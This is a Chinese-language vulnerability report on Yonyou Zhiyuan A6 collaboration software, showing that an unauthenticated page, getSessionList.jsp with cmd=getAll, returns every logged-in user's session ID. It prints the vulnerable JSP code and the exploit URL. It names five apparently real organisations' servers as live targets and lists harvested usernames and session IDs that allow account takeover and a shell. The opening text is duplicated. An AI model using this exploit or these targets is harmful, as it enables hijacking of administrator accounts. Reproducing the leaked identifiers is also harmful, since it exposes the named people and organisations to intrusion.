### 简要描述: 用友致远A6协同管理高危漏洞二 ### 详细说明: 该漏洞泄露了当前登录用户(所有登录的)的SessionID; 利用泄露的SessionID即可登录该用户,包括管理员,进入后getshell毫无压力 /yyoa/ext/https/getSessionList.jsp 部分代码 ``` <%@ page contentType="text/html;charset=GBK"%> <%@ page session= "false" %> <%@ page import="net.btdz.oa.ext.https.*"%> <% String reqType = request.getParameter("cmd"); String outXML = ""; boolean allowHttps = true; if("allowHttps".equalsIgnoreCase(reqType)){ //add code to judge whether it allow https or not allowHttps = FetchSessionList.checkHttps(); if (allowHttps) response.setHeader("AllowHttps","1"); } if("getAll".equalsIgnoreCase(reqType)){ outXML = FetchSessionList.getXMLAll(); } else if("getSingle".equalsIgnoreCase(reqType)){ String sessionId = request.getParameter("ssid"); if(sessionId != null){ outXML = FetchSessionList.getXMLBySessionId(sessionId); } } else{ outXML += "<?xml version=\"1.0\" encoding=\"GB2312\"?>\r\n"; outXML += "<SessionList>\r\n"; //outXML += "<Session>\r\n"; //outXML += "</Session>\r\n"; outXML +=...
### 简要描述: 用友致远A6协同管理高危漏洞二 ### 详细说明: 该漏洞泄露了当前登录用户(所有登录的)的SessionID; 利用泄露的SessionID即可登录该用户,包括管理员,进入后getshell毫无压力 /yyoa/ext/https/getSessionList.jsp 部分代码 ``` <%@ page contentType="text/html;charset=GBK"%> <%@ page session= "false" %> <%@ page import="net.btdz.oa.ext.https.*"%> <% String reqType = request.getParameter("cmd"); String outXML = ""; boolean allowHttps = true; if("allowHttps".equalsIgnoreCase(reqType)){ //add code to judge whether it allow https or not allowHttps = FetchSessionList.checkHttps(); if (allowHttps) response.setHeader("AllowHttps","1"); } if("getAll".equalsIgnoreCase(reqType)){ outXML = FetchSessionList.getXMLAll(); } else if("getSingle".equalsIgnoreCase(reqType)){ String sessionId = request.getParameter("ssid"); if(sessionId != null){ outXML = FetchSessionList.getXMLBySessionId(sessionId); } } else{ outXML += "<?xml version=\"1.0\" encoding=\"GB2312\"?>\r\n"; outXML += "<SessionList>\r\n"; //outXML += "<Session>\r\n"; //outXML += "</Session>\r\n"; outXML += "</SessionList>\r\n"; } out.println(outXML); %> ``` 从上面的代码可知,当cmd参数为getAll时,便可获取到所有用户的SessionID 例如: http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll ``` weiph 9EA4F8832FA1C9BA99E3D13E2F01CAF7 zhaozy F9244E7F1B8C39BB8919FAE8E19ED16A ``` http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll ``` huangsc 0088D0C9F166AD9E5C4907908B97CF2B jiangyl 1057A63B52E4D78CA92B989149D1AC37 lisy 1586E35E947B4EF4C92AD27B8D1C279B zhongjh 1AE537BD94C0286CE5FFE0509B4AB6D0 //... ``` http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll ``` yanyongrong 372BE72272E0C6ABB3A5815AACAD5AB8 wujianbo 5D33C475E451E080C074DD741F46470B wangluolijin 64CCB1F31B206ADA1716A8A0252137EA tianqinghua 78C93A5F4CEA64E34B654E8FEE470A1E lidalong 84037EF6F41432DE9EE907C94F7B091B liujianjun 98745C840A8BE288D91C50BB8D1F6A54 ``` 案例: http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://60.31.196.2/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://110.167.194.10:8081/yyoa/ext/https/getSessionList.jsp?cmd=getAll ### 漏洞证明: 利用获取到的sessionid,成功登录用户。 [<img src="https://images.seebug.org/upload/201503/19214803b49fdccdc00a3c283748211aa9176ea4.jpg" alt="aa.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19214803b49fdccdc00a3c283748211aa9176ea4.jpg)
